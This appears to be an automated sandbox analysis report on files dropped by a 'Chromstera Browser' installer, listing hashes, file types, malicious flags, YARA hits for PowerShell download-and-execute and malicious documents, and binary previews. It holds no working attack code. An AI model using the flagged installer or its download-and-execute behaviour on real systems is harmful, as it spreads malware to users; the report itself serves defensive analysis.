                                                                                                                                                                            SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                                                                                                                                                                            MD5:11F7419009AF2874C4B0E4505D185D79
                                                                                                                                                                            SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                                                                                                                                                                            SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                                                                                                                                                                            SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5038592
                                                                                                                                                                            Entropy (8bit):6.043058205786219
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                                                                                                                                                                            MD5:11F7419009AF2874C4B0E4505D185D79
                                                                                                                                                                            SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                                                                                                                                                                            SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                                                                                                                                                                            SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {2BF917DE-5B34-453F-A1C8-08CE02C334FC}, Number of Words: 2, Subject: Chromstera Browser, Author: Chromstera Solutions, Name of Creating Application: Chromstera Browser, Template: x64;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Aug 11 12:56:12 2023, Number of Pages: 200
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5414912
                                                                                                                                                                            Entropy (8bit):6.6703025648499255
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:98304:IYJRr+uKTFK+XpBflMPzidUtYoS9PURx1RK/Tvn/8/n:PJ1eBfM2NP6cr/M
                                                                                                                                                                            MD5:2F35E6F54DACD3559EF63F8493405884
                                                                                                                                                                            SHA1:0CFBF79DBD20D9DBD6F88CA7EE51B476DEF73A85
                                                                                                                                                                            SHA-256:590A97E2D47B8B1009728087DBA010ADDA34C9666103791A60C9DDD984C9644E
                                                                                                                                                                            SHA-512:70F600EB430D908F99E8D9924AE539BCFC21F43ADEA366C3BF2C0D207BC90881381BC3536E1DE17ED2A5400ADC8190A84C246E811593B8B1A682DA10AEDED1A0
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi, Author: Joe Security
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:Microsoft Cabinet archive data, many, 537602 bytes, 3 files, at 0x44 +A "manifest.json" +A "service.js", flags 0x4, ID 1234, number 1, extra bytes 20 in head, 37 datablocks, 0x1 compression
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):549914
                                                                                                                                                                            Entropy (8bit):7.99656918630297
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:12288:5PssyeijXugzQ9ng7tLKQgxVUU+e0FXCQsY8Iy0W:G7zGYKTMlFXGYvW
                                                                                                                                                                            MD5:6734CC1E240B7F556E3AE09EA56E02C9
                                                                                                                                                                            SHA1:E8D7810283CC2D788C620E31B677B9D69944E6CB
                                                                                                                                                                            SHA-256:0036A0F85C7D9276BD0C5EB04B54DB37BF8ABA49453BB2D338FF1FA278F756C1
                                                                                                                                                                            SHA-512:5E8285166F392AFBFD5448B50AAFE4FCA551EE82C744574C344114AD88BFEE7E70AE6CDD945E0FD4A98B52CE68BE5EB2530D84BCB16FA3C969292FBCA26321C8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {2BF917DE-5B34-453F-A1C8-08CE02C334FC}, Number of Words: 2, Subject: Chromstera Browser, Author: Chromstera Solutions, Name of Creating Application: Chromstera Browser, Template: x64;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Aug 11 12:56:12 2023, Number of Pages: 200
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5414912
                                                                                                                                                                            Entropy (8bit):6.6703025648499255
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:98304:IYJRr+uKTFK+XpBflMPzidUtYoS9PURx1RK/Tvn/8/n:PJ1eBfM2NP6cr/M
                                                                                                                                                                            MD5:2F35E6F54DACD3559EF63F8493405884
                                                                                                                                                                            SHA1:0CFBF79DBD20D9DBD6F88CA7EE51B476DEF73A85
                                                                                                                                                                            SHA-256:590A97E2D47B8B1009728087DBA010ADDA34C9666103791A60C9DDD984C9644E
                                                                                                                                                                            SHA-512:70F600EB430D908F99E8D9924AE539BCFC21F43ADEA366C3BF2C0D207BC90881381BC3536E1DE17ED2A5400ADC8190A84C246E811593B8B1A682DA10AEDED1A0
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\6bc77d.msi, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\6bc77d.msi, Author: Joe Security
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):664896
                                                                                                                                                                            Entropy (8bit):6.580111290566735
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:lurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2X45c6EKgkj:0ihNREtRdYndJP32R7vKG+47/L0I5jEg
                                                                                                                                                                            MD5:F2DD0D7EBAB0352E434FA65386425F33
                                                                                                                                                                            SHA1:A6D808538D1A0D7984B4AE3DCD16AEA185702E50
                                                                                                                                                                            SHA-256:1C65E72519B605E0A322DD32625782978A5BC74CEC81F73638A215CA5B9D0F9D
                                                                                                                                                                            SHA-512:76D1F0125835C13B5E0CE52E9AAB450713CB45A82544215E1EE17B094FD5D16B066544E032E96F94F727427F055F691655D6DBBB5E4A8C54AF774A2B97F524C0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):570176
                                                                                                                                                                            Entropy (8bit):6.4754135618709885
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:V7illiy0jC24y27NuNMM1o6BFCzS0IJPD+G63u+znIBhVWYusLQys6od5zg:UuGBYusLRs6S5zg
                                                                                                                                                                            MD5:514314174B6F6A3AB2195C456B83AA1E
                                                                                                                                                                            SHA1:D4CEDCB663F534FBDC93D7A53E0A5A4CAE2B4E7B
                                                                                                                                                                            SHA-256:DC20BD05C938C5C9CE13D2D3CD78D1479B7D74C24E1356F36C7C8E8F6BEFE597
                                                                                                                                                                            SHA-512:061AE3D1D410F24EB6C13E3B0AF81E760881E9F4A71EA1FB9F84E84D20047F719B845BEA7F435454DF33310FE1294D46F8F7DD40EAAFFCEB53D280A9238BD9F2
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):217920
                                                                                                                                                                            Entropy (8bit):6.659990688109136
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:s3mBJDmU1w79thLwNj3xrvkLzDSpjqBIe2c8AOAg0FuDGMxwVb7zY2+fS4P:s3MN9WmHcLz+pjqgAOSMmEfSC
                                                                                                                                                                            MD5:AE9AA65470306DB7DB02371779BBCE64
                                                                                                                                                                            SHA1:6580975408BC4013A5E7A3E717912B30B1CB6294
                                                                                                                                                                            SHA-256:FB7B23455C1BE134A4F89824F1CE45EF7D09A25188B6C726ADA9690C9B28EF33
                                                                                                                                                                            SHA-512:DB36D383DED9DA8C5B0BE211CB3C816787629993015763A5A19067BC86351C65CC4A9ED149416DF47D3DE02EA3CC35803862EA029FBD5059B1633A2630F7A769
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):753984
                                                                                                                                                                            Entropy (8bit):6.46150792241965
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:ZQznHEVvieXxN4Mbq6Xe8wTAolS1IUNyz+ly/U0GCt57Wf63RfkleA:QnHEVv9fpXRARw1IUNA/n957Wf63h0eA
                                                                                                                                                                            MD5:8F517D6C505B7F9EC21CD40DB49227D9
                                                                                                                                                                            SHA1:E7C7E0ED1D8B2F09FF187C516F22747CD3ED49F8
                                                                                                                                                                            SHA-256:A908CD8FC097381F5A49A9FE1E1D3F81873D4004732A655EBF2AFA93BDF126CF
                                                                                                                                                                            SHA-512:DCD087F3ECF30A348A8D99962D5B69A1A78627218C775E03A41233622F433B2C12FA3138084B84E89AC8A681601A5333E379BB3701FE7321C36EFB2E20E5F26F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6434340
                                                                                                                                                                            Entropy (8bit):6.68149115147602
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:98304:evSeSNn/8/nTn/8/nkn/8/neYJqYJ4n/8/nZn/8/n4n/8/nW+uKTFd:x/MT/Mk/MlJZJ4/MZ/M4/M4S
                                                                                                                                                                            MD5:CE3829A031A468B4E2DFF76877D19C81
                                                                                                                                                                            SHA1:0BD9A3F51B26751552646DC41B18534CE8BCC4E4
                                                                                                                                                                            SHA-256:49F85BA7AC0A545A893C7B9B99535C608D81850137ACEA73551B50D79E051831
                                                                                                                                                                            SHA-512:3A9636B8657F8973297E0028ED936127E1A946934CD2478B9B28DB5BEB9157B92BB3ED2F74D0892D8A5E4348B76D7400270F89D5BE344801C5FDFD2D01799A9B
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\MSICC46.tmp, Author: Joe Security
                                                                                                                                                                            Preview:...@IXOS.@.....@mq\Y.@.....@.....@.....@.....@.....@......&.{441BEFA6-D7B1-4C8C-8CF9-5A4D6215E43D}..Chromstera Browser..Chromnius-Main.msi.@.....@.....@.....@........&.{2BF917DE-5B34-453F-A1C8-08CE02C334FC}.....@.....@.....@.....@.......@.....@.....@.......@......Chromstera Browser......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........AI_RemoveAllTempFiles....J...AI_RemoveAllTempFiles.@......@S..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W..............................................._..............................Q......9...........Rich...........PE..L...A>.d.........."!...$..................... ...............................P.......I....@.....................................<.... ..................@=...0..\.......p...................@...........@............ ...............................text...V..........................
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):211776
                                                                                                                                                                            Entropy (8bit):6.545789465666009
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:APFAhETm5/VCZCuRspcZ2XcIQISCXOtwypRnWmomS7/Br5vEgn/Zr/e:bim5/VJuRLXDCXObptI/p5vD12
                                                                                                                                                                            MD5:6CE8F1D957A3545827ABA750E2087548
                                                                                                                                                                            SHA1:4EF30873A3A4CD2138320A3AECF9C0235F2993A9
                                                                                                                                                                            SHA-256:6DE3B9B00849AB2398B36446B16E7A435CDBF8610B31FFD36E381636DC33E3A8
                                                                                                                                                                            SHA-512:030E400A759B4F4B972D92BFCA8771A90BD87DE8C93B8BAD99B814563D52CC97703A0C21DFAA4D022D2111CCD77F9144D028F2016C66F3429E59589A8B390DB9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.R...<...<...<...?.u.<...9...<..8.n.<..?.l.<...8.i.<..9.K.<...:.~.<...=.n.<...=...<.f.5.g.<.f.<.~.<.f..~.<....~.<.f.>.~.<.Rich..<.................PE..L....=.d.........."!...$.0...........2.......@...............................0............@.................................H...x.......x...............@=......x......p............................E..@............@..........@....................text...]/.......0.................. ..`.rdata.......@.......4..............@..@.data...............................@....rsrc...x...........................@..@.reloc..x........ ..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):664896
                                                                                                                                                                            Entropy (8bit):6.580111290566735
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:lurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2X45c6EKgkj:0ihNREtRdYndJP32R7vKG+47/L0I5jEg
                                                                                                                                                                            MD5:F2DD0D7EBAB0352E434FA65386425F33
                                                                                                                                                                            SHA1:A6D808538D1A0D7984B4AE3DCD16AEA185702E50
                                                                                                                                                                            SHA-256:1C65E72519B605E0A322DD32625782978A5BC74CEC81F73638A215CA5B9D0F9D
                                                                                                                                                                            SHA-512:76D1F0125835C13B5E0CE52E9AAB450713CB45A82544215E1EE17B094FD5D16B066544E032E96F94F727427F055F691655D6DBBB5E4A8C54AF774A2B97F524C0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.:.w.T,w.T,w.T,..W-z.T,..Q-.T,..P-a.T,..P-f.T,..W-m.T,..Q-+.T,..U-`.T,w.U,\.T,n.]-@.T,n.T-v.T,n.,v.T,w..,v.T,n.V-v.T,Richw.T,........PE..L...K>.d.........."!...$.r..................................................0......+.....@..........................q.......q..........................@=.......\......p...............................@............................................text....q.......r.................. ..`.rdata..v............v..............@..@.data................h..............@....rsrc...............................@..@.reloc...\.......^..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):570176
                                                                                                                                                                            Entropy (8bit):6.4754135618709885
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:V7illiy0jC24y27NuNMM1o6BFCzS0IJPD+G63u+znIBhVWYusLQys6od5zg:UuGBYusLRs6S5zg
                                                                                                                                                                            MD5:514314174B6F6A3AB2195C456B83AA1E
                                                                                                                                                                            SHA1:D4CEDCB663F534FBDC93D7A53E0A5A4CAE2B4E7B
                                                                                                                                                                            SHA-256:DC20BD05C938C5C9CE13D2D3CD78D1479B7D74C24E1356F36C7C8E8F6BEFE597
                                                                                                                                                                            SHA-512:061AE3D1D410F24EB6C13E3B0AF81E760881E9F4A71EA1FB9F84E84D20047F719B845BEA7F435454DF33310FE1294D46F8F7DD40EAAFFCEB53D280A9238BD9F2
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aawD..$D..$D..$.r.%N..$.r.%...$.~.%V..$.~.%N..$.~.%...$.r.%P..$.r.%E..$.r.%]..$D..$...$]..%^..$]..$E..$D..$E..$]..%E..$RichD..$........................PE..d....>.d.........."....$.4...h......`..........@..........................................`.............................................................8....p...?...v..@=......l...@x..p....................y..(....w..@............P.. ............................text...<3.......4.................. ..`.rdata.......P.......8..............@..@.data...,G... ......................@....pdata...?...p...@..................@..@_RDATA..\............X..............@..@.rsrc...8............Z..............@..@.reloc..l............f..............@..B................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                            Entropy (8bit):0.7903190731460404
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:JSbX72Fj4XAlfLIlHuRpFhG7777777777777777777777777ZDHFkTNQRskSpW6w:JYUIwYikSHkF
                                                                                                                                                                            MD5:4ABDC48549915868E5ACE18556DF33A3
                                                                                                                                                                            SHA1:92EE321A29713A2327E6DBF91D6705E51690237E
                                                                                                                                                                            SHA-256:B336DE350F1BD596987674E0836A141407B85652F3C34BC00D2561861A15F865
                                                                                                                                                                            SHA-512:77AAC75B891D646E7768ABEF5644FC152F907D59CB4FF7EE222FF46106386A6DEC53EADF3BE8E9813CF88BA3E476FBD244D8387FFA0EE9441CB4C738A2DFF9A6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):1.4778506022448366
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:dbMubs4aFXzBT5lUkKvy9dlGb4pWSkdFE4pB+9iH9Z9f/ZpHAtvC5v1v/vqsDFDS:NMv/TLkeGlXHZAtatn3gOa5R
                                                                                                                                                                            MD5:6E923EF4AFB8BB8C0852F4635C6CE2A8
                                                                                                                                                                            SHA1:4F272659CD8830829A49F2FD467D5507D173FAC6
                                                                                                                                                                            SHA-256:64337AA249EBD51495A3837CB2EC1F7FB85DBEB5C044AB87C5ADFC124F6C898B
                                                                                                                                                                            SHA-512:42E734F29C1108335D716632DDD26C585469DB4BEAE899E31B9F0B1144F19248D153B0EC48AA5758A0EE2B070EEB992FEFC75046C23E5812136877DBB7785E5E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):432221
                                                                                                                                                                            Entropy (8bit):5.375183336522233
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauP:zTtbmkExhMJCIpErS
                                                                                                                                                                            MD5:EFD20624AF25AE6B4500B224AA6F6E27
                                                                                                                                                                            SHA1:EAE78D092E2202409C06682AAF2772B9675303AA
                                                                                                                                                                            SHA-256:AE93EEFB0FC9BB5C9AE36BB671CE70C73B9A19AE63C249BFBDE1AC8FAD4350A8
                                                                                                                                                                            SHA-512:49F2B5AD4AFAB110D3451A2FA4AD87FD1F102C2F4D5BF94E6D7DCD0E4E2E82FF3707D93E901111752D7586818C32FC5125DAFB5F181F0B58FA4A69B1B1D7EED1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):119
                                                                                                                                                                            Entropy (8bit):4.705502631558087
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:RrwNFRJ9fVl3HY9lFFH0y3yHXWTbMExAiqFrKRZJzyn:RrwXz9fVBYtFH0uy3I4miFOZJzyn
                                                                                                                                                                            MD5:500ED8AEBC03F996A593076ACBB47984
                                                                                                                                                                            SHA1:BA9657F90E586C1E43758400B48F724E48F54DE6
                                                                                                                                                                            SHA-256:7A5ADC811C18F01C442372B3A06F70D8242C0EDEB5754CAC3187CF593B26B220
                                                                                                                                                                            SHA-512:0D01F057D15E2B2E18CE5B7DE59C26B488A67BBDD2D1E64E861BE3C687DF0EDC22CEEBDFF6D6AAD05DD83391DF283695F7BD7CEF14A18836827C33CFE7AED2D0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:ERROR: Exception calling "DownloadFile" with "2" argument(s): "The remote server returned an error: (404) Not Found."..
